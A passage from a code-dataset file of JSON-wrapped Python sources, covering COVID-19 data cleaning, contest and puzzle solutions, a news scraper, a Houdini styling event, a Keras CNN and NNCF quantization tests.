if Path(filename).exists() and not force:\n self._raw = self.load(filename)\n else:\n self._raw = self._retrieve(filename=filename, verbose=verbose)\n self._cleaned_df = self._cleaning()\n self._country = \"Japan\"\n self._citation = \"Lisphilar (2020), COVID-19 dataset in Japan, GitHub repository, \" \\\n \"https://github.com/lisphilar/covid19-sir/data/japan\"\n\n def _retrieve(self, filename, verbose=1):\n \"\"\"\n Retrieve the dataset from server.\n\n Args:\n filename (str or pathlib.path): CSV filename to save the raw dataset\n verbose (int): level of verbosity\n\n Returns:\n pd.DataFrame: raw dataset\n \"\"\"\n # Show URL\n if verbose:\n print(\n \"Retrieving COVID-19 dataset in Japan from https://github.com/lisphilar/covid19-sir/data/japan\")\n # Download the dataset at country level\n cols = [\n \"Area\", \"Date\", \"Positive\",\n \"Tested\", \"Discharged\", \"Fatal\", \"Hosp_require\", \"Hosp_severe\",\n ]\n c_df = self.load(self.URL_C, header=0).rename(\n {\"Location\": \"Area\"}, axis=1)[cols]\n # Download the datset at province level\n p_df = self.load(self.URL_P, header=0).rename(\n {\"Prefecture\": \"Area\"}, axis=1)[cols]\n # Combine the datsets\n df = pd.concat([c_df, p_df], axis=0, ignore_index=True, sort=True)\n # Save the raw data\n df.to_csv(filename, index=False)\n return df\n\n def _cleaning(self):\n \"\"\"\n Perform data cleaning of the raw data.\n\n Returns:\n pandas.DataFrame: cleaned data\n \"\"\"\n df = self._raw.copy()\n # Rename columns\n df = df.rename(\n {\n \"Area\": self.PROVINCE,\n \"Date\": self.DATE,\n \"Positive\": self.C,\n \"Fatal\": self.F,\n \"Discharged\": self.R,\n \"Hosp_severe\": self.SEVERE,\n \"Tested\": self.TESTED\n },\n axis=1\n )\n # Date\n df[self.DATE] = pd.to_datetime(df[self.DATE])\n # Fill NA values\n for col in [self.C, self.F, self.R, self.SEVERE, \"Hosp_require\", self.TESTED]:\n df[col] = pd.to_numeric(df[col], errors=\"coerce\")\n df = df.groupby(self.PROVINCE).apply(\n lambda x: x.set_index(self.DATE).resample(\"D\").interpolate(\"linear\", limit_direction=\"both\"))\n df = df.fillna(0).drop(self.PROVINCE, axis=1).reset_index()\n df = df.sort_values(self.DATE).reset_index(drop=True)\n # Records at country level (Domestic/Airport/Returnee) and entering Japan(Airport/Returnee)\n e_cols = [\"Airport\", \"Returnee\"]\n e_df = df.loc[df[self.PROVINCE].isin(e_cols)].groupby(self.DATE).sum()\n e_df[self.PROVINCE] = \"Entering\"\n c_cols = [\"Domestic\", \"Airport\", \"Returnee\"]\n c_df = df.loc[df[self.PROVINCE].isin(c_cols)].groupby(self.DATE).sum()\n c_df[self.PROVINCE] = self.UNKNOWN\n df = pd.concat(\n [\n df.loc[~df[self.PROVINCE].isin(c_cols)],\n e_df.reset_index(),\n c_df.reset_index(),\n ],\n ignore_index=True, sort=True)\n # Moderate\n df[self.MODERATE] = df[\"Hosp_require\"] - df[self.SEVERE]\n # Value columns\n df[self.CI] = df[self.C] - df[self.F] - df[self.R]\n df[self.JAPAN_VALUE_COLS] = df[self.JAPAN_VALUE_COLS].astype(np.int64)\n # Country\n df[self.COUNTRY] = \"Japan\"\n return df.loc[:, self.JAPAN_COLS]\n\n def set_variables(self):\n raise NotImplementedError\n","sub_path":"covsirphy/cleaning/japan_data.py","file_name":"japan_data.py","file_ext":"py","file_size_in_byte":5611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"285854121","text":"def NotHappy(cakes):\r\n for cake in cakes:\r\n if cake == '-':\r\n return True\r\n return False\r\n\r\ndef flip(cake):\r\n if cake == '-':\r\n return '+'\r\n else:\r\n return '-'\r\n\r\n \r\ndef flipPancakes(cakes, S):\r\n 
flips = 0\r\n    while NotHappy(cakes):\r\n        count = 0 #index of '-'\r\n        cakes = list(cakes) #e.g. \"++--++\" --> [+,+,-,-,+,+]\r\n        \r\n        #iterate from left to right\r\n        for cake in cakes:\r\n            if cake == '-': #if there is '-', flip\r\n                #check if can flip\r\n                if count + S > len(cakes): #cannot flip\r\n                    return \"IMPOSSIBLE\"\r\n                else: #flip\r\n                    for i in range(count,count+S):\r\n                        cakes[i] = flip(cakes[i])\r\n                    flips += 1\r\n            count += 1\r\n\r\n    return flips\r\n    \r\n    \r\nfilename = \"A-large.in\"\r\ninfile = open(filename, 'r')\r\nlines = infile.readlines()\r\n\r\ncases = []\r\nt = int(lines[0].strip('\\n'))\r\nfor i in range(1,t+1):\r\n    cases.append(lines[i].strip('\\n').split(' ')) #e.g. [\"-+---+\", 4]\r\ninfile.close()\r\n\r\noutfile = open(\"A-large.out\", 'w')\r\n\r\ncaseNo = 1\r\nfor case in cases:\r\n    result = flipPancakes(case[0],int(case[1]))\r\n    outfile.write(\"Case #{}: {}\\n\".format(caseNo, result))\r\n    caseNo += 1\r\n\r\noutfile.close()\r\n","sub_path":"solutions_python/Problem_199/3886.py","file_name":"3886.py","file_ext":"py","file_size_in_byte":1325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"377727915","text":"from tkinter import *\r\nfrom tkinter import messagebox\r\nimport winsound\r\n\r\nbeeptimes = int(input('How many times do you want a beep to beep?: '))\r\n\r\ndef beepByTimes(freq, dur):\r\n    for _ in range(beeptimes):\r\n        winsound.Beep(freq, dur)\r\ndef bAaction():\r\n    print('beep beep')\r\n    beepByTimes(770, 150)\r\n    messagebox.showinfo(\"Beep\", \"Beep Beep :)\")\r\ndef bBaction():\r\n    print('high beep beep')\r\n    beepByTimes(1500, 150)\r\n    messagebox.showinfo(\"Beep\", \"Ouch, don't poke me like that! owowowowow\")\r\n\r\nwindow = Tk()\r\n\r\nbuttonA = Button(window, text='Click here', command=bAaction)\r\nbuttonB = Button(window, text=\"Don't click here\", command=bBaction)\r\n\r\nbuttonA.pack()\r\nbuttonB.pack()\r\n\r\nwindow.mainloop()\r\n","sub_path":"Python/beep_submit.py","file_name":"beep_submit.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"163772517","text":"def mergeSortedLists(lst1, lst2, lst3=None):\n    '''\n    Objective : To merge two sorted lists.\n    Input Parameters :\n        lst1 : The first list containing sorted elements.\n        lst2 : The second list containing sorted elements.\n    Return :\n        lst3 : The third list created by merging lst1 and lst2.\n    '''\n    if lst3 is None: # avoid sharing a mutable default argument between calls\n        lst3 = []\n    \n    if ( not lst1 and not lst2 ):\n        return lst3\n    elif ( lst1 and not lst2 ):\n        lst3.extend(lst1)\n        return lst3\n    elif ( not lst1 and lst2):\n        lst3.extend(lst2)\n        return lst3\n    else:\n        if( lst1[0] < lst2[0] ):\n            lst3.append(lst1[0])\n            mergeSortedLists(lst1[1:], lst2, lst3)\n            return lst3 \n        else:\n            lst3.append(lst2[0])\n            mergeSortedLists(lst1, lst2[1:], lst3)\n            return lst3\n\n#Test cases\nl1=[40, 50, 100, 200, 300]\nprint('List 1 - ', l1)\nl2=[1,5.5,10,21,31]\nprint('List 2 - ', l2)\nl3=mergeSortedLists(l1,l2)\nprint('Merged List - ', l3)\n\nl1=[]\nprint('List 1 - ', l1)\nl2=[1,5.5,10,21,31]\nprint('List 2 - ', l2)\nl3=[]\nl3=mergeSortedLists(l1,l2,l3)\nprint('Merged List - ', l3)\n\nl1=[0]\nprint('List 1 - ', l1)\nl2=[1,5.5,10,21,31]\nprint('List 2 - ', l2)\nl3=[]\nl3=mergeSortedLists(l1,l2,l3)\nprint('Merged List - ', l3)\n\nl1=[100]\nprint('List 1 - ', l1)\nl2=[1,5.5,10,21,31]\nprint('List 2 - ', l2)\nl3=[]\nl3=mergeSortedLists(l1,l2,l3)\nprint('Merged List - ', l3)\n\nl1=[25,79]\nprint('List 1 - ', l1)\nl2=[1,5.5,10,21,31]\nprint('List 2 - ', l2)\nl3=[]\nl3=mergeSortedLists(l1,l2,l3)\nprint('Merged List - ', 
l3)\n\nl1=[4,5,23,40]\nprint('List 1 - ', l1)\nl2=[1,5.5,10,21,31]\nprint('List 2 - ', l2)\nl3=[]\nl3=mergeSortedLists(l1,l2,l3)\nprint('Merged List - ', l3)\n\n\n","sub_path":"MCA-101-oops/Piazza/merge_lists.py","file_name":"merge_lists.py","file_ext":"py","file_size_in_byte":1702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"164700908","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Oct 29 12:36:01 2019\r\n\r\n@author: RUDRAJIT\r\n\"\"\"\r\n#importing libraries\r\nimport networkx as nx\r\nimport random\r\nimport matplotlib.pyplot as plt\r\n\r\n#Creating the Graph\r\nG=nx.gnp_random_graph(10,0.5,directed=True)\r\n#visualize\r\nnx.draw(G,with_labels=True)\r\nplt.show()\r\n\r\n#initializing points\r\npoints=[100 for x in range(G.number_of_nodes())]\r\n\r\n#distributing points\r\ndef distr_points(points,G):\r\n    nodes=list(G.nodes())\r\n    new_points=[0 for x in range(G.number_of_nodes())]\r\n    for n in nodes:\r\n        out=list(G.out_edges(n))\r\n        if len(out)==0:\r\n            new_points[n]+=points[n]\r\n        else:\r\n            share=points[n]/len(out)\r\n            for (src,tgt) in out:\r\n                new_points[tgt]+=share\r\n    return new_points\r\n    \r\ndef keep_distr(points,G):\r\n    for i in range(1000):\r\n        #while(1):\r\n        new_points=distr_points(points,G)\r\n        #print(new_points)\r\n        points=new_points\r\n        #stop=input(\"Press q to quit any other button to continue:-\")\r\n        #if stop=='q':\r\n        #    break\r\n    return new_points\r\n\r\n#New points after distribution\r\nnew_points=keep_distr(points,G)\r\ndict_counter={i:(new_points[i]/1000) for i in range(len(new_points))}\r\n#verifying with inbuilt function results\r\nresult=nx.pagerank(G)\r\nprint(sorted(dict_counter.items(),key=lambda f:f[1]))\r\nprint(\"\\n\")\r\nprint(sorted(result.items(),key=lambda f:f[1]))\r\n","sub_path":"Page Rank Algorithms/point_distribution_approach.py","file_name":"point_distribution_approach.py","file_ext":"py","file_size_in_byte":1430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"298542907","text":"import scrapy\nfrom scrapy import Selector,Request\nfrom crawl.items.xinhua import XinHuaItem\nimport re,json\n\nclass XinHuaWangItem(scrapy.Spider):\n    name = 'xhw'\n    allowed_domains = []\n    start_urls = ['http://qc.wa.news.cn/nodeart/list?nid=113352&pgnum=1&cnt=10&tp=1&orderby=1']\n\n    def parse(self, response):\n        rules = json.loads(response.text[1:-1])\n        data = rules.get('data')\n        data_list = data.get('list')\n        for raw in data_list:\n            url = raw.get('LinkUrl')\n            # print(url)\n            PubTime = raw.get('PubTime')\n            title = raw.get('Title')\n            # print(title)\n            yield Request(url=url,callback=self.parse_content,meta={'PubTime':PubTime,'title':title})\n        page_num = re.findall('pgnum=(\\d+)', response.url)[0]\n        next_page = int(page_num) + 1\n        next_p = re.sub('pgnum=(\\d+)', 'pgnum=' + str(next_page), response.url)\n        yield Request(url=next_p, callback=self.parse)\n\n    def parse_content(self,response):\n        sel = Selector(response)\n        # title = ''.join(bod.css('div.h-title::text').extract_first())\n        # print(title)\n        print(response.meta.get('title'))\n        print(response.meta.get('PubTime'))\n        tim = ''.join(sel.css('div.h-info span::text').re('\\d+-\\d+-\\d+\\s\\d+:\\d+:\\d+'))\n        laiyuan = ''.join(sel.xpath('//div[@class=\"h-info\"]/span[2]//text()').extract())\n        every = ''.join(sel.css('p::text').extract())\n        zebian = ''.join(sel.css('span.p-jc::text').extract())\n        print(laiyuan)\n        print(every)\n        
print(zebian)","sub_path":"crawl/spiders/llvjie/xinhuawang.py","file_name":"xinhuawang.py","file_ext":"py","file_size_in_byte":1594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"504746151","text":"\"\"\"This module contains an event to style nodes based on events.\"\"\"\n\n# =============================================================================\n# IMPORTS\n# =============================================================================\n\n# Houdini Toolbox Imports\nfrom ht.events.group import HoudiniEventGroup\nfrom ht.events.item import HoudiniEventItem\nfrom ht.events import NodeEvents\nfrom ht.nodes.styles.manager import MANAGER\n\n\n# =============================================================================\n# CLASSES\n# =============================================================================\n\n\nclass StyleNodeEvent(HoudiniEventGroup):\n \"\"\"Event to style Houdini nodes based on events.\"\"\"\n\n def __init__(self):\n super(StyleNodeEvent, self).__init__()\n\n self.event_map.update(\n {\n NodeEvents.OnCreated: HoudiniEventItem((self.style_node_on_creation,)),\n NodeEvents.OnNameChanged: HoudiniEventItem((self.style_node_by_name,)),\n }\n )\n\n # -------------------------------------------------------------------------\n # METHODS\n # -------------------------------------------------------------------------\n\n def style_node_by_name(self, scriptargs): # pylint: disable=no-self-use\n \"\"\"Style a node based on a name.\n\n :param scriptargs: Data passed by event runner.\n :type scriptargs: dict\n :return:\n\n \"\"\"\n node = scriptargs[\"node\"]\n\n MANAGER.style_node_by_name(node)\n\n def style_node_on_creation(self, scriptargs): # pylint: disable=no-self-use\n \"\"\"Style a node on creation.\"\n\n :param scriptargs: Data passed by event runner.\n :type scriptargs: dict\n :return:\n\n \"\"\"\n node = scriptargs[\"node\"]\n\n MANAGER.style_node(node)\n","sub_path":"python/ht/nodes/styles/event.py","file_name":"event.py","file_ext":"py","file_size_in_byte":1816,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"408837746","text":"from keras.models import Sequential\nfrom keras.layers.core import Dense, Dropout, Activation, Flatten\nfrom keras.layers.convolutional import Conv2D, MaxPooling2D\nfrom keras.optimizers import SGD, Adadelta, Adagrad, Adam\nfrom keras.regularizers import l2 #, activity_l2\n\nnb_classes = 10\n# input image dimensions\nimg_rows, img_cols = 28, 28\ninput_shape = (img_rows, img_cols, 1)\n\n\nmodel = Sequential()\nmodel.add(Conv2D(32, kernel_size=(3, 3),\n activation='relu',\n input_shape=input_shape))\nmodel.add(Conv2D(64, (3, 3), activation='relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\nmodel.add(Dropout(0.25))\nmodel.add(Flatten())\nmodel.add(Dense(128, activation='relu'))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(nb_classes, activation='softmax'))\n\nmodel.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\n\n","sub_path":"cnn_architecture2.py","file_name":"cnn_architecture2.py","file_ext":"py","file_size_in_byte":862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"473508364","text":"def run(data):\n record = sorted(data.splitlines())\n guards = {}\n cur_guard = ''\n for line in record:\n if '#' in line:\n cur_guard = line[26:].split(' ')[0]\n if cur_guard not in guards:\n guards[cur_guard] = {}\n elif 'asleep' in line:\n strt = 
int(line[15:17])\n elif 'wakes' in line:\n for i in range(strt, int(line[15:17])):\n guards[cur_guard][i] = guards[cur_guard].get(i, 0) + 1\n t = 0\n m = 0\n grd = ''\n for name, times in guards.items():\n for minu, cnt in times.items():\n if cnt > t:\n t = cnt\n grd = name\n m = minu\n return int(grd) * m\n","sub_path":"Python/04/02.py","file_name":"02.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"477574502","text":"\"\"\"\n Copyright (c) Apache License, Version 2.0 (the \"License\");\n you may not use this file except in compliance with the License.\n You may obtain a copy of the License at\n http://www.apache.org/licenses/LICENSE-2.0\n Unless required by applicable law or agreed to in writing, software\n distributed under the License is distributed on an \"AS IS\" BASIS,\n WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n See the License for the specific language governing permissions and\n limitations under the License.\n\"\"\"\nfrom collections import Counter\nfrom functools import partial\nfrom typing import List, Dict\n\nimport onnx\nimport pytest\nimport torch\nimport torch.nn\nfrom onnx import numpy_helper\n\nfrom nncf.dynamic_graph.graph import OperationExecutionContext, InputAgnosticOperationExecutionContext\nfrom nncf.dynamic_graph.trace_tensor import TensorMeta\nfrom nncf.nncf_network import InsertionInfo\nfrom nncf.quantization.algo import PatternBasedQuantizerSetupGenerator\nfrom nncf.quantization.layers import AsymmetricQuantizer\nfrom nncf.quantization.quantizer_id import NonWeightQuantizerId\nfrom tests.helpers import create_compressed_model_and_algo_for_test\nfrom tests.quantization.test_quantization_helpers import get_quantization_config_without_range_init\n\n\ndef make_op_exec_context_for_coalescing_test(scope_str: str) -> OperationExecutionContext:\n ia_op_exec_context = InputAgnosticOperationExecutionContext.from_str(scope_str)\n op_exec_context = OperationExecutionContext(ia_op_exec_context.operator_name,\n ia_op_exec_context.scope_in_model,\n ia_op_exec_context.call_order,\n [TensorMeta(0, 0, [1])])\n return op_exec_context\n\n\ndef make_insertion_info_for_coalescing_test(scope_str: str,\n linked_insertion_infos: List[InsertionInfo] = None,\n in_port_id: int = None)\\\n -> InsertionInfo:\n op_exec_context = make_op_exec_context_for_coalescing_test(scope_str)\n retval = InsertionInfo(op_exec_context, in_port_id=in_port_id)\n if linked_insertion_infos is not None:\n retval.link_insertion_infos(linked_insertion_infos)\n return retval\n\n\n@pytest.mark.parametrize(\"input_insertion_infos, linked_scopes_groups_list, ref_coalesced_insertion_infos\",\n # ref_coalesced_insertion_infos == None means that the coalescing should raise an exception\n [\n # 0 - Empty linked scopes list\n (\n [\n make_insertion_info_for_coalescing_test(\n \"Foo/Baz[bar]/conv2d_0\"\n ),\n make_insertion_info_for_coalescing_test(\n \"Foo/Xyz[leet]/__add___0\",\n in_port_id=1\n )\n ],\n [],\n # Same as input\n [\n make_insertion_info_for_coalescing_test(\n \"Foo/Baz[bar]/conv2d_0\"\n ),\n make_insertion_info_for_coalescing_test(\n \"Foo/Xyz[leet]/__add___0\",\n in_port_id=1\n )\n ],\n ),\n # 1 - Linked scope only affects 1 operation\n (\n [\n make_insertion_info_for_coalescing_test(\n \"Foo/Baz[bar]/conv2d_0\",\n in_port_id=0\n ),\n make_insertion_info_for_coalescing_test(\n \"Foo/Xyz[leet]/__add___0\"\n )\n ],\n [[\"Foo/Baz[bar]/conv2d_0\"]],\n # Same as input\n [\n 
make_insertion_info_for_coalescing_test(\n \"Foo/Baz[bar]/conv2d_0\",\n in_port_id=0\n ),\n make_insertion_info_for_coalescing_test(\n \"Foo/Xyz[leet]/__add___0\"\n )\n ]\n ),\n # 2 - Same as 1 but with multiple groups\n (\n [\n make_insertion_info_for_coalescing_test(\n \"Foo/Baz[bar]/conv2d_0\",\n in_port_id=0\n ),\n make_insertion_info_for_coalescing_test(\n \"Foo/Xyz[leet]/__add___0\",\n in_port_id=1\n )\n ],\n [[\"Foo/Baz[bar]/conv2d_0\"], [\"Foo/Xyz[leet]/__add___0\"]],\n # Same as input again\n [\n make_insertion_info_for_coalescing_test(\n \"Foo/Baz[bar]/conv2d_0\",\n in_port_id=0\n ),\n make_insertion_info_for_coalescing_test(\n \"Foo/Xyz[leet]/__add___0\",\n in_port_id=1\n )\n ]\n ),\n # 3 - Single group affecting some of the scopes\n (\n [\n make_insertion_info_for_coalescing_test(\n \"Foo/Baz[bar]/conv2d_0\"\n ),\n make_insertion_info_for_coalescing_test(\n \"Foo/Baz[bar]/linear_0\",\n in_port_id=0\n ),\n make_insertion_info_for_coalescing_test(\n \"Foo/Xyz[leet]/__add___0\",\n in_port_id=1\n ),\n make_insertion_info_for_coalescing_test(\n \"Foo/Xyz[leet]/matmul_0\",\n in_port_id=1\n )\n ],\n [[\"Foo/Xyz[leet]/matmul_0\", \"Foo/Xyz[leet]/__add___0\", \"Foo/Baz[bar]/linear_0\"]],\n [\n make_insertion_info_for_coalescing_test(\n \"Foo/Xyz[leet]/matmul_0\",\n in_port_id=1,\n linked_insertion_infos=[\n make_insertion_info_for_coalescing_test(\n \"Foo/Baz[bar]/linear_0\",\n in_port_id=0\n ),\n make_insertion_info_for_coalescing_test(\n \"Foo/Xyz[leet]/__add___0\",\n in_port_id=1\n ),\n ]\n ),\n make_insertion_info_for_coalescing_test(\n \"Foo/Baz[bar]/conv2d_0\"\n )\n ]\n ),\n\n # 4 - Multiple groups, each affecting one operation\n (\n [\n make_insertion_info_for_coalescing_test(\n \"Foo/Baz[bar]/conv2d_0\",\n in_port_id=0\n ),\n make_insertion_info_for_coalescing_test(\n \"Foo/Baz[bar]/linear_0\"\n ),\n make_insertion_info_for_coalescing_test(\n \"Foo/Xyz[leet]/__add___0\",\n in_port_id=0\n ),\n make_insertion_info_for_coalescing_test(\n \"Foo/Xyz[leet]/matmul_0\",\n in_port_id=0\n ),\n make_insertion_info_for_coalescing_test(\n \"Foo/Asdf[jkl]/softmax_0\"\n ),\n ],\n [[\"Foo/Baz[bar]/linear_0\"], [\"Foo/Asdf[jkl]/softmax_0\"]],\n [\n # Same as input\n make_insertion_info_for_coalescing_test(\n \"Foo/Baz[bar]/conv2d_0\",\n in_port_id=0\n ),\n make_insertion_info_for_coalescing_test(\n \"Foo/Baz[bar]/linear_0\"\n ),\n make_insertion_info_for_coalescing_test(\n \"Foo/Xyz[leet]/__add___0\",\n in_port_id=0\n ),\n make_insertion_info_for_coalescing_test(\n \"Foo/Xyz[leet]/matmul_0\",\n in_port_id=0\n ),\n make_insertion_info_for_coalescing_test(\n \"Foo/Asdf[jkl]/softmax_0\"\n ),\n ]\n ),\n\n # 5 - Multiple groups affecting multiple operations without overlapping\n (\n [\n make_insertion_info_for_coalescing_test(\n \"Foo/Baz[bar]/conv2d_0\"\n ),\n make_insertion_info_for_coalescing_test(\n \"Foo/Baz[bar]/linear_0\",\n in_port_id=0\n ),\n make_insertion_info_for_coalescing_test(\n \"Foo/Xyz[leet]/__add___0\",\n in_port_id=1\n ),\n make_insertion_info_for_coalescing_test(\n \"Foo/Xyz[leet]/matmul_0\"\n ),\n make_insertion_info_for_coalescing_test(\n \"Foo/Asdf[jkl]/softmax_0\"\n ),\n make_insertion_info_for_coalescing_test(\n \"Foo/Asdf[jkl]/softmax_1\",\n in_port_id=0\n ),\n ],\n [[\"Foo/Baz[bar]/conv2d_0\",\n \"Foo/Baz[bar]/linear_0\"],\n [\"Foo/Asdf[jkl]/softmax_1\", \"Foo/Xyz[leet]/__add___0\"]],\n [\n make_insertion_info_for_coalescing_test(\n \"Foo/Baz[bar]/conv2d_0\",\n linked_insertion_infos=[\n make_insertion_info_for_coalescing_test(\n \"Foo/Baz[bar]/linear_0\",\n in_port_id=0\n 
),\n ]\n ),\n make_insertion_info_for_coalescing_test(\n \"Foo/Asdf[jkl]/softmax_1\",\n in_port_id=0,\n linked_insertion_infos=[\n make_insertion_info_for_coalescing_test(\n \"Foo/Xyz[leet]/__add___0\",\n in_port_id=1\n ),\n ]\n ),\n make_insertion_info_for_coalescing_test(\n \"Foo/Xyz[leet]/matmul_0\"\n ),\n make_insertion_info_for_coalescing_test(\n \"Foo/Asdf[jkl]/softmax_0\"\n ),\n ]\n ),\n\n # 6 - A variation of 5\n (\n [\n make_insertion_info_for_coalescing_test(\n \"Foo/Baz[bar]/conv2d_0\"\n ),\n make_insertion_info_for_coalescing_test(\n \"Foo/Baz[bar]/linear_0\"\n ),\n make_insertion_info_for_coalescing_test(\n \"Foo/Xyz[leet]/__add___0\"\n ),\n make_insertion_info_for_coalescing_test(\n \"Foo/Xyz[leet]/matmul_0\"\n ),\n make_insertion_info_for_coalescing_test(\n \"Foo/Asdf[jkl]/softmax_0\"\n ),\n make_insertion_info_for_coalescing_test(\n \"Foo/Asdf[jkl]/Qwer[tyu]/conv2d_0\",\n in_port_id=0,\n ),\n ],\n [[\"Foo/Baz[bar]/conv2d_0\", \"Foo/Baz[bar]/linear_0\", \"Foo/Xyz[leet]/matmul_0\"],\n [\"Foo/Asdf[jkl]/softmax_0\", \"Foo/Asdf[jkl]/Qwer[tyu]/conv2d_0\"]],\n [\n make_insertion_info_for_coalescing_test(\n \"Foo/Baz[bar]/conv2d_0\",\n linked_insertion_infos=[\n make_insertion_info_for_coalescing_test(\n \"Foo/Baz[bar]/linear_0\"\n ),\n make_insertion_info_for_coalescing_test(\n \"Foo/Xyz[leet]/matmul_0\"\n )\n ]\n ),\n make_insertion_info_for_coalescing_test(\n \"Foo/Asdf[jkl]/softmax_0\",\n linked_insertion_infos=[\n make_insertion_info_for_coalescing_test(\n \"Foo/Asdf[jkl]/Qwer[tyu]/conv2d_0\",\n in_port_id=0,\n ),\n ]\n ),\n make_insertion_info_for_coalescing_test(\n \"Foo/Xyz[leet]/__add___0\"\n ),\n ]\n ),\n\n # 7 - Overlapping groups\n (\n [\n make_insertion_info_for_coalescing_test(\n \"Foo/Baz[bar]/conv2d_0\"\n ),\n make_insertion_info_for_coalescing_test(\n \"Foo/Baz[bar]/linear_0\"\n ),\n make_insertion_info_for_coalescing_test(\n \"Foo/Xyz[leet]/__add___0\"\n ),\n make_insertion_info_for_coalescing_test(\n \"Foo/Xyz[leet]/matmul_0\",\n in_port_id=1,\n ),\n make_insertion_info_for_coalescing_test(\n \"Foo/Asdf[jkl]/softmax_0\"\n ),\n make_insertion_info_for_coalescing_test(\n \"Foo/Asdf[jkl]/Qwer[tyu]/conv2d_0\"\n ),\n ],\n [[\"Foo/Baz[bar]/conv2d_0\", \"Foo/Baz[bar]/linear_0\", \"Foo/Xyz[leet]/matmul_0\"],\n [\"Foo/Xyz[leet]/matmul_0\",\n \"Foo/Asdf[jkl]/Qwer[tyu]/conv2d_0\"]],\n None\n ),\n\n # 8 - More than 1 match for the operation specified in the group\n\n (\n [\n make_insertion_info_for_coalescing_test(\n \"Foo/Baz[bar]/conv2d_0\"\n ),\n make_insertion_info_for_coalescing_test(\n \"Foo/Baz[bar]/conv2d_0\",\n in_port_id=0,\n ),\n make_insertion_info_for_coalescing_test(\n \"Foo/Baz[bar]/linear_0\",\n ),\n make_insertion_info_for_coalescing_test(\n \"Foo/Xyz[leet]/__add___0\",\n ),\n make_insertion_info_for_coalescing_test(\n \"Foo/Xyz[leet]/matmul_0\",\n in_port_id=1,\n ),\n make_insertion_info_for_coalescing_test(\n \"Foo/Asdf[jkl]/softmax_0\"\n ),\n make_insertion_info_for_coalescing_test(\n \"Foo/Asdf[jkl]/Qwer[tyu]/conv2d_0\"\n ),\n ],\n [[\"Foo/Baz[bar]/conv2d_0\", \"Foo/Xyz[leet]/matmul_0\"],\n [\"Foo/Xyz[leet]/matmul_0\",\n \"Foo/Asdf[jkl]/Qwer[tyu]/conv2d_0\"]],\n None\n ),\n\n # 9 - No match for an operation specified in the group\n (\n [\n make_insertion_info_for_coalescing_test(\n \"Foo/Baz[bar]/conv2d_0\",\n in_port_id=0,\n ),\n make_insertion_info_for_coalescing_test(\n \"Foo/Baz[bar]/linear_0\"\n ),\n make_insertion_info_for_coalescing_test(\n \"Foo/Xyz[leet]/__add___0\"\n ),\n make_insertion_info_for_coalescing_test(\n \"Foo/Xyz[leet]/matmul_0\",\n 
in_port_id=1,\n ),\n make_insertion_info_for_coalescing_test(\n \"Foo/Asdf[jkl]/softmax_0\"\n ),\n make_insertion_info_for_coalescing_test(\n \"Foo/Asdf[jkl]/Qwer[tyu]/conv2d_0\"\n ),\n ],\n [[\"Foo/Baz[bar]/conv2d_0\", \"Foo/Xyz[leet]/matmul_1\"],\n [\"Foo/Xyz[leet]/matmul_0\",\n \"Foo/Asdf[jkl]/Qwer[tyu]/conv2d_0\"]],\n None\n ),\n ])\ndef test_insertion_info_coalescing(input_insertion_infos: List[InsertionInfo],\n linked_scopes_groups_list: List[List[str]],\n ref_coalesced_insertion_infos: List[InsertionInfo]):\n if ref_coalesced_insertion_infos is None:\n with pytest.raises(RuntimeError):\n _ = PatternBasedQuantizerSetupGenerator.coalesce_insertion_infos(input_insertion_infos,\n linked_scopes_groups_list)\n else:\n test_coalesced_insertion_infos = PatternBasedQuantizerSetupGenerator.coalesce_insertion_infos(\n input_insertion_infos,\n linked_scopes_groups_list)\n assert Counter(test_coalesced_insertion_infos) == Counter(ref_coalesced_insertion_infos)\n\n\nclass QuantizerLinkingTestModel(torch.nn.Module):\n def __init__(self):\n super().__init__()\n self._dummy_trainable_param = torch.nn.Parameter(torch.ones([1]))\n\n class Path(torch.nn.Module):\n def forward(self, input_1, input_2):\n retval0 = input_1 + input_2\n retval1 = retval0 * input_2\n retval2 = retval0 + retval1\n # __add___0, __mul___0, __add___1 results respectively\n return retval0, retval1, retval2\n\n self.path1 = Path()\n self.path2 = Path()\n\n def forward(self, input_1, input_2):\n path1_results = self.path1(input_1, input_2)\n path2_results = self.path2(input_1, input_2)\n return tuple(x + y for x, y in zip(path1_results, path2_results))\n\n\ndef test_quantizer_scale_linking():\n nncf_config = get_quantization_config_without_range_init(model_size=1)\n nncf_config['quantizer_setup_type'] = 'pattern_based'\n nncf_config[\"compression\"][\"quantize_outputs\"] = True\n nncf_config[\"compression\"][\"quantize_inputs\"] = False\n nncf_config[\"input_info\"] = [\n {\n \"sample_size\": [1, 1, 1, 1],\n },\n {\n \"sample_size\": [1, 1, 1, 1],\n }\n ]\n nncf_config[\"compression\"][\"activations\"] = {\n \"linked_quantizer_scopes\": [\n [\n # Note: Assuming that quantizers are attached as a post-op to the specified operation\n \"QuantizerLinkingTestModel/Path[path2]/__mul___0\",\n \"QuantizerLinkingTestModel/Path[path2]/__add___0\",\n ]\n ],\n \"ignored_scopes\": [\n # Ignore path output averaging operations\n \"QuantizerLinkingTestModel/__add___0\",\n \"QuantizerLinkingTestModel/__add___1\",\n \"QuantizerLinkingTestModel/__add___2\",\n ]\n }\n\n compressed_model, compression_ctrl = create_compressed_model_and_algo_for_test(QuantizerLinkingTestModel(),\n nncf_config)\n\n # 2 paths x 3 quantizers - 1 because two are shared in one path\n assert len(compression_ctrl.non_weight_quantizers) == 5\n\n test_input1 = 